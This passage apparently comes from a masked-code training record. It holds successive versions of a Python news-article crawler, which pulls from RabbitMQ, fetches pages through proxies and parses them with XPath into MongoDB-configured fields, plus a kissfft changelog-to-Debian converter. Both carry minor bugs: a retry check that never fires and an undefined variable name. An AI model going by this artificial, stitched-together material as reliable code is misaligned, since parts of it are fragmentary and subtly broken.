page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
"step-2": "<mask token>\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n\n def clean(self, message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'], message[\n 'post_time'], re.S | re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info('post_time清洗失败{}'.format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'], message['author']).group(1)\n message['author'] = author\n except:\n log.info('author清洗失败{}'.format(message['author']))\n message['author'] = None\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'], message[\n 'source_detail'], re.S | re.M).group(1)\n message['source_detail'] = source_detail\n except:\n log.info('source_detail清洗失败{}'.format(message['source_detail'])\n )\n message['source_detail'] = None\n return message\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con 
= html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n 
ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
"step-3": "<mask token>\nm.admin.authenticate(setting['mongo_config']['user_name'], setting[\n 'mongo_config']['password'])\n<mask token>\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n\n def clean(self, message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'], message[\n 'post_time'], re.S | re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info('post_time清洗失败{}'.format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'], message['author']).group(1)\n message['author'] = author\n except:\n log.info('author清洗失败{}'.format(message['author']))\n message['author'] = None\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'], message[\n 'source_detail'], re.S | re.M).group(1)\n message['source_detail'] = source_detail\n except:\n log.info('source_detail清洗失败{}'.format(message['source_detail'])\n )\n message['source_detail'] = None\n return message\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n 
log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n 
produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
"step-4": "import requests\nfrom lxml import etree\nfrom pymongo import MongoClient\nfrom lib.rabbitmq import Rabbit\nfrom lib.log import LogHandler\nfrom lib.proxy_iterator import Proxies\nimport yaml\nimport json\nimport datetime\nimport re\nimport time\nsetting = yaml.load(open('config_local.yaml'))\nlog = LogHandler('article_consumer')\nm = MongoClient(setting['mongo_config']['config_host'], setting[\n 'mongo_config']['port'])\nm.admin.authenticate(setting['mongo_config']['user_name'], setting[\n 'mongo_config']['password'])\ncollection = m[setting['mongo_config']['config_db']][setting['mongo_config'\n ]['coll_detail']]\nclean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config'\n ]['clean']]\nrabbit = Rabbit(setting['rabbitmq_host'], setting['rabbitmq_port'])\nconnection = rabbit.connection\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n\n def clean(self, message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'], message[\n 'post_time'], re.S | re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info('post_time清洗失败{}'.format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'], message['author']).group(1)\n message['author'] = author\n except:\n log.info('author清洗失败{}'.format(message['author']))\n message['author'] = None\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'], message[\n 'source_detail'], re.S | re.M).group(1)\n 
message['source_detail'] = source_detail\n except:\n log.info('source_detail清洗失败{}'.format(message['source_detail'])\n )\n message['source_detail'] = None\n return message\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if 
detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
"step-5": "import requests\nfrom lxml import etree\nfrom pymongo import MongoClient\nfrom lib.rabbitmq import Rabbit\nfrom lib.log import LogHandler\nfrom lib.proxy_iterator import Proxies\nimport yaml\nimport json\nimport datetime\nimport re\nimport time\n\n\nsetting = yaml.load(open('config_local.yaml'))\nlog = LogHandler('article_consumer')\nm = MongoClient(setting['mongo_config']['config_host'], setting['mongo_config']['port'])\nm.admin.authenticate(setting['mongo_config']['user_name'],setting['mongo_config']['password'] )\ncollection = m[setting['mongo_config']['config_db']][setting['mongo_config']['coll_detail']]\nclean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config']['clean']]\nrabbit = Rabbit(setting['rabbitmq_host'],setting['rabbitmq_port'])\nconnection = rabbit.connection\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url,\n queue='usual_article',\n no_ack=False)\n channel.start_consuming()\n\n def clean(self,message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'],message['post_time'],re.S|re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info(\"post_time清洗失败{}\".format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'],message['author']).group(1)\n message['author'] = author\n except:\n log.info(\"author清洗失败{}\".format(message['author']))\n message['author'] = None\n\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'],message['source_detail'],re.S|re.M).group(1)\n message['source_detail'] = 
source_detail\n except:\n log.info(\"source_detail清洗失败{}\".format(message['source_detail']))\n message['source_detail'] = None\n\n return message\n\n\n def consume_article_detail_url(self,ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'],timeout=10,proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error(\"请求文章详情页{}失败\".format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n\n # 获取详情页的解析方式\n detail_config_dict = collection.find_one({'source': message['source']})\n\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict['comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count'])[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info(\"没有提取到{}作者字段\".format(message['detail_url']))\n if detail_config_dict['post_time'] 
is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict['post_time'])[0]\n except:\n log.info(\"没有提取到{}文章发表时间\".format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict['source_detail'])[0]\n except:\n log.info(\"没有提取到{}文章详细来源\".format(message['detail_url']))\n\n self.clean(message)\n\n # 放入消息队列做正文替换清洗\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='',\n routing_key='article_body',\n body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Changelog-conversion loop: turns upstream CHANGELOG entries (stdin) into
# Debian changelog stanzas (stdout).  The names used here (re_entry_begin,
# header_format, signature_format, VERSION_DATES, ...) are defined elsewhere
# in this file.
for line in sys.stdin:
    m = re_entry_begin.match(line)
    if m:
        if first_line_met:
            # Close the previous stanza before opening a new one.
            sys.stdout.write(signature_format.format(date=current_date))
        version = m.group('version')
        sys.stdout.write(header_format.format(version=version))
        date = m.group('date')
        if date is None:
            # Header carried no date; fall back to the known-release table.
            date = VERSION_DATES[version]
        current_date = None
        for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
            try:
                current_date = datetime.strptime(date, date_format)
                break
            except ValueError:
                continue
        if current_date is None:
            # NOTE(review): `date_formats` is undefined here -- this raises
            # NameError instead of the intended ValueError.
            raise ValueError('Date {} does not match any date format in {!r}'
                .format(date, date_formats))
        first_line_met = True
    line_blank = not line.strip() or line.startswith('\\* *This Change Log was'
        )
    if first_line_met and not (line_blank and last_line_blank):
        sys.stdout.write(' ' + line)
    last_line_blank = line_blank
if first_line_met:
    if not line_blank:
        sys.stdout.write('\n')
    # Close the final stanza.
    sys.stdout.write(signature_format.format(date=current_date))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
MONTHS_REGEXP = (
'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'
)
re_entry_begin = re.compile(
'(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:' +
MONTHS_REGEXP + ') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = """ -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}
"""
VERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':
'2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':
'2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}
first_line_met = False
current_date = None
last_line_blank = False
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith('\\* *This Change Log was'
)
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
<|reserved_special_token_1|>
# Convert the kissfft CHANGELOG (read on stdin) into Debian changelog
# format (written to stdout).
from datetime import datetime
import re
import sys
MONTHS_REGEXP = (
    'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'
    )
# Matches an entry header such as "1.2.8 (2008-08-22)" or "1.2: Jan 01, 2004".
re_entry_begin = re.compile(
    '(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:' +
    MONTHS_REGEXP + ') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = """ -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}
"""
# Release dates missing from the CHANGELOG (recovered from the hg log).
VERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':
    '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':
    '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}
first_line_met = False  # True once the first entry header has been seen
current_date = None  # release date of the entry currently being emitted
last_line_blank = False  # used to collapse runs of blank lines
for line in sys.stdin:
    m = re_entry_begin.match(line)
    if m:
        if first_line_met:
            # Close the previous stanza before opening a new one.
            sys.stdout.write(signature_format.format(date=current_date))
        version = m.group('version')
        sys.stdout.write(header_format.format(version=version))
        date = m.group('date')
        if date is None:
            date = VERSION_DATES[version]
        current_date = None
        for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
            try:
                current_date = datetime.strptime(date, date_format)
                break
            except ValueError:
                continue
        if current_date is None:
            # NOTE(review): `date_formats` is undefined here -- this raises
            # NameError instead of the intended ValueError.
            raise ValueError('Date {} does not match any date format in {!r}'
                .format(date, date_formats))
        first_line_met = True
    line_blank = not line.strip() or line.startswith('\\* *This Change Log was'
        )
    if first_line_met and not (line_blank and last_line_blank):
        sys.stdout.write(' ' + line)
    last_line_blank = line_blank
if first_line_met:
    if not line_blank:
        sys.stdout.write('\n')
    # Close the final stanza.
    sys.stdout.write(signature_format.format(date=current_date))
<|reserved_special_token_1|>
#!/usr/bin/env python3
"""Convert the kissfft CHANGELOG (read on stdin) into Debian changelog
format (written to stdout)."""
from datetime import datetime
import re
import sys

MONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'
                 'January|February|March|April|June|July|August|September|October|November|December')

# Matches an entry header such as "1.2.8 (2008-08-22)" or "1.2: Jan 01, 2004".
re_entry_begin = re.compile(r'(?P<version>[\d.]+)[ :]*\(?(?P<date>\d\d\d\d-\d\d-\d\d|(?:'
                            + MONTHS_REGEXP + r') \d\d, \d\d\d\d)?\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n'

# Date spellings accepted in entry headers.
DATE_FORMATS = ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y')

# Missing from CHANGELOG (found in hg log), or not parseable easily
VERSION_DATES = {
    '1.2.8': '2008-08-22',
    '1.2.7': '2007-01-07',
    '1.2.2': '2005-05-06',
    '1.2.1': '2004-04-04',
    '1.1.1': '2004-02-01',
    '1.1': '2004-01-30',
    '0.4': '2003-11-04',
    '0.1': '2003-05-19',
}


def parse_entry_date(date):
    """Parse *date* with the first matching format in DATE_FORMATS.

    Raises ValueError if no format matches.  (BUG FIX: the original error
    path referenced the undefined name `date_formats`, so a bad date raised
    NameError instead of the intended ValueError.)
    """
    for date_format in DATE_FORMATS:
        try:
            return datetime.strptime(date, date_format)
        except ValueError:
            continue
    raise ValueError('Date {} does not match any date format in {!r}'
                     .format(date, DATE_FORMATS))


def main():
    """Stream-convert stdin to stdout, one Debian changelog stanza per entry."""
    first_line_met = False   # an entry header has been seen
    current_date = None      # release date of the entry being emitted
    last_line_blank = False  # used to collapse runs of blank lines
    line_blank = False
    for line in sys.stdin:
        m = re_entry_begin.match(line)
        if m:
            if first_line_met:
                # Close the previous stanza before opening a new one.
                sys.stdout.write(signature_format.format(date=current_date))
            version = m.group('version')
            sys.stdout.write(header_format.format(version=version))
            date = m.group('date')
            if date is None:
                # Header carried no date; fall back to the known-release table.
                date = VERSION_DATES[version]
            current_date = parse_entry_date(date)
            first_line_met = True
        line_blank = not line.strip() or line.startswith(r'\* *This Change Log was')
        if first_line_met and not (line_blank and last_line_blank):
            sys.stdout.write('    ' + line)
        last_line_blank = line_blank
    if first_line_met:
        if not line_blank:
            sys.stdout.write('\n')
        # Close the final stanza.
        sys.stdout.write(signature_format.format(date=current_date))


if __name__ == '__main__':
    main()
|
flexible
|
{
"blob_id": "03677f02473019fcc6a40d91569a85be78ca0a87",
"index": 7179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-3": "<mask token>\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-4": "from datetime import datetime\nimport re\nimport sys\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
